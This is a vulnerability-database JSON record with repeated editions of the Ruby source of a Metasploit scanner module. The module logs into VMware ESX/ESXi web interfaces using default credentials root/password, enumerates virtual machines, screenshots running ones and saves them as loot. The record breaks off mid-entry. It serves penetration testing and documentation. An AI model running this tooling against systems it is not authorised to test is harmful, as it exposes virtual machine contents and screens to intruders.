{"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-12-16T23:06:30", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/vmware/vmware_enum_vms", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:55:28", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_status(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\n\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-07-02T23:55:28", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/vmware/vmware_enum_vms", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:29:47", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-07-24T19:29:47", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:10", "history": [], "viewCount": 2, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-08-21T15:32:10", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-17T19:25:17", "history": [], "viewCount": 2, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-10-17T19:25:17", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-18T07:16:05", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-10-18T07:16:05", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-11-07T07:46:21", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-11-07T07:46:21", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-11-08T19:42:26", "history": [], "viewCount": 3, "enchantments": {"score": {"modified": "2017-11-08T19:42:26", "value": 5.1}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2017-11-08T19:42:26", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-29T18:09:31", "history": [], "viewCount": 3, "enchantments": {"score": {"modified": "2018-01-29T18:09:31", "value": 5.1}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2018-01-29T18:09:31", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "8369b2c53fa14b26ef02015e573f5964", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-29T22:11:10", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": 